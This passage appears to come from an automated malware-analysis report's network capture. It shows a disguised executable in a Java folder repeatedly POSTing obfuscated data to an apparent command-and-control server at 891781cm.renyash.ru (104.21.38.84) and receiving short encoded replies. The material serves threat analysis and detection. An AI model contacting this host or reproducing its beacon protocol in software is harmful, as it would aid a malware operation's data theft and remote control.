                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 55 27 38 34 05 28 10 00 11 2f 06 3c 0f 25 2c 3e 14 30 33 34 58 24 2e 31 59 2e 5e 34 13 3c 2b 30 06 25 29 3e 06 34 21 29 02 32 36 2e 5d 04 1d 26 04 3f 2a 2d 07 2b 59 25 5b 3e 1c 02 16 33 34 28 01 25 34 24 58 33 3d 03 02 20 31 38 0b 27 33 3c 56 28 17 38 00 26 2e 2d 0c 23 00 2e 57 0d 12 22 1c 25 10 17 55 3e 1f 0a 1e 21 2c 38 0b 30 01 24 0c 24 3c 0e 50 34 28 2a 54 3d 59 3b 03 22 37 39 12 27 39 2f 5f 36 07 21 58 36 23 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"U'84(/<%,>034X$.1Y.^4<+0%)>4!)26.]&?*-+Y%[>34(%4$X3= 18'3<V(8&.-#.W"%U>!,80$$<P4(*T=Y;"79'9/_6!X6#"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  89 | 192.168.2.4 | 49953 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:14.924045086 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:15.275104046 CET | 1072 | OUT | Data Raw: 55 50 5d 54 5a 5b 51 55 55 5a 54 59 51 59 55 56 58 5c 5c 59 59 51 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]TZ[QUUZTYQYUVX\\YYQRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+?-#+%[&1*.'%-$X'/>W3,/,.+?-8W=,#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:15.365559101 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:15.627419949 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:15 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mwh2mN2yt4RwwUyxeuIhv26NNaLpNe6aYNgqbZWYKDumFQNV1Mz51qCv1mG6XCKlxZw%2BSm3CRzBGUcRCwRm6oG4aixveWcRq6Dwh6yVFVwNf6tKNLnfiFs9PXlTnIYmgcdZQuQuB"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d3cbfe27c8e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=1913&rtt_var=922&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=534407&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  90 | 192.168.2.4 | 49960 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:15.763194084 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:16.118840933 CET | 1072 | OUT | Data Raw: 55 51 5d 50 5f 5c 51 5a 55 5a 54 59 51 5a 55 5c 58 5e 5c 5d 59 54 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]P_\QZUZTYQZU\X^\]YTRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ (,541$=>*- 34.-4Y3Y"0;+(-#(<#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:16.247865915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:16.484397888 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:16 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHzJpD6%2Fd72KtYP5pvVIpd9F1sm%2F6TGZz8taTb03etQK8%2Fp%2BD1WLUR%2FzzL4mJkzIvZdr1%2F6mtA2M1nJFgxAMcTiz08cHva0p%2BVilc3RB8NT3mwzEMWKNMtq3HBTCnwzAGWZqeqv%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d422ef2440e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3909&min_rtt=1755&rtt_var=4966&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=76890&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  91 | 192.168.2.4 | 49966 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:16.668313026 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:17.025093079 CET | 1072 | OUT | Data Raw: 55 5f 5d 51 5a 5b 54 5a 55 5a 54 59 51 58 55 53 58 5a 5c 5c 59 54 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U_]QZ[TZUZTYQXUSXZ\\YTRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<7&%=>*-?$2V:#')$/?_8>]( =,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:17.111984015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:17.372205973 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:17 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vEjQjjTMk975TbLR%2BDUazTNllsPs%2BXnS6hcPgLo4KjcAFwyFTtuxZkqNB7pJ6OkfgNDsaFut2vV6UU2xSnmn%2B3iJsyupVyh1udUhzLFN7gGdpGk8wfXDz5BplLL3ldx5rgSfWPDP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d47a87e72a5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2566&min_rtt=1962&rtt_var=1945&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=214705&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  92 | 192.168.2.4 | 49972 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:17.496002913 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:17.853107929 CET | 1072 | OUT | Data Raw: 50 54 5d 57 5a 5f 54 5f 55 5a 54 59 51 52 55 5d 58 5a 5c 5f 59 56 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PT]WZ_T_UZTYQRU]XZ\_YVRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<<6 (=Z%X%[=(''%.' 3?03/>?=-4V=,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:17.946589947 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:18.205727100 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:18 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPW00OK2Ma8ANBYDLZRClyls3Z8fmktfDnPVFjaZ%2FhiDH1rQEgiYRrUqfy8MaelHeBDvbLg76lDN%2Bu50hdL69UZqKkf3WzmnN4i1WRH7BgFa91KllX%2B3LexEQR2%2FdJDf%2BtRvwVot"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d4cee29727d-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8978&min_rtt=2023&rtt_var=14669&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=25319&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  93 | 192.168.2.4 | 49978 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:18.325073957 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:18.682190895 CET | 1072 | OUT | Data Raw: 55 57 5d 51 5f 59 54 5e 55 5a 54 59 51 5a 55 51 58 58 5c 5e 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]Q_YT^UZTYQZUQXX\^YQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#</79_2>!=-?$B&9$X0/5$?3/>^?>3)#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:18.794529915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:19.059082031 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2yU3vrlbdRmSfui87PaY8nqcDZmJeIFWOCfN5X%2FAgxqGp4sh6CzP057oCMQCROSki%2BsfuA%2FZO0c3ev7yPCc407SSyLGwVLPm0b%2FiN6vZRQXiasUd7%2FTWQN12OVs%2FgRzs8t%2FfrNAj"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d522b53c341-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4688&min_rtt=1660&rtt_var=6679&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=56394&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  94 | 192.168.2.4 | 49985 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:19.185750961 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:19.540599108 CET | 1072 | OUT | Data Raw: 55 54 58 5c 5a 58 51 5d 55 5a 54 59 51 5e 55 57 58 59 5c 5d 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTX\ZXQ]UZTYQ^UWXY\]YQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?<1Z4(=_%=(./Y''>:4'/0,8=([+X7),#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:19.629554033 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:19.903908968 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:19 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sjllbSjuKIg2gm0XxbXhyi1dM2JH4yLu7XhWAhKVX%2F52iCQnJYk32SGy61tocniJd7O%2BGME8Ed1nSHtCIsUI3XQqtaybVUbWpX0wqtY3dm%2FSEgOUPiZpY%2BfNqjz9usI54wes9uy1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d576aef32c7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2384&min_rtt=2025&rtt_var=1477&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=298080&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  95 | 192.168.2.4 | 49991 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:20.030601978 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.384675980 CET | 1072 | OUT | Data Raw: 50 53 5d 51 5a 5b 54 58 55 5a 54 59 51 53 55 5d 58 5b 5c 55 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]QZ[TXUZTYQSU]X[\UY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?*#822) $41-B(\32U&,+[;>,\+V*<#^!'^)


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  96 | 192.168.2.4 | 49994 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:20.453216076 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.806566954 CET | 1796 | OUT | Data Raw: 50 52 5d 57 5a 5d 51 5f 55 5a 54 59 51 5f 55 5c 58 5d 5c 5a 59 54 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PR]WZ]Q_UZTYQ_U\X]\ZYTR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ])/=[ _%X=Z0&V-^310(,.]<7)#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:20.941778898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.190026999 CET | 955 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qVT4fbKSYsYwjebhSHxpRzjGLGTkLMiHLy1SndXBGWw4H0YlsOB6KVLYJD7Z4HZwvD6wOEC6W3D7VTGPmsnP9fZihEg2T7LW1PMI4M%2BYtHv8hMXdQE9K99k6v2OmZb%2B%2Bz%2F5KcGiC"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30d5f895a72ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4414&min_rtt=2013&rtt_var=5557&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=68796&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 50 33 02 37 5e 28 3d 2d 02 2c 11 0d 57 32 59 25 00 30 30 28 5b 25 10 25 58 2f 28 24 5d 3e 3b 28 06 26 29 22 01 20 31 2e 5b 26 26 2e 5d 04 1d 25 5b 3e 2a 2a 59 2b 11 0b 5f 2a 54 30 15 33 37 24 05 32 1a 0d 03 26 2d 22 59 20 22 01 1e 27 23 0d 0a 2b 2a 33 12 24 03 26 1f 34 00 2e 57 0d 12 22 1c 24 2d 26 0e 2a 31 09 0a 35 2f 2c 0b 27 11 2f 56 24 12 0d 0e 21 38 0f 0e 2a 3c 3c 10 21 24 3a 08 24 3a 3f 1d 21 39 29 58 36 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"P37^(=-,W2Y%00([%%X/($]>;(&)" 1.[&&.]%[>**Y+_*T037$2&-"Y "'#+*3$&4.W"$-&*15/,'/V$!8*<<!$:$:?!9)X63"T /T=VO0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  97 | 192.168.2.4 | 49997 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Jan 1, 2025 15:03:20.574517012 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:20.931339025 CET | 1072 | OUT | Data Raw: 55 57 5d 56 5f 59 51 5f 55 5a 54 59 51 5e 55 57 58 59 5c 58 59 52 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]V_YQ_UZTYQ^UWXY\XYRRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ )?.#]>2:) $$V:B<\0<>0<3-=$+<=#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:21.047241926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:21.215697050 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
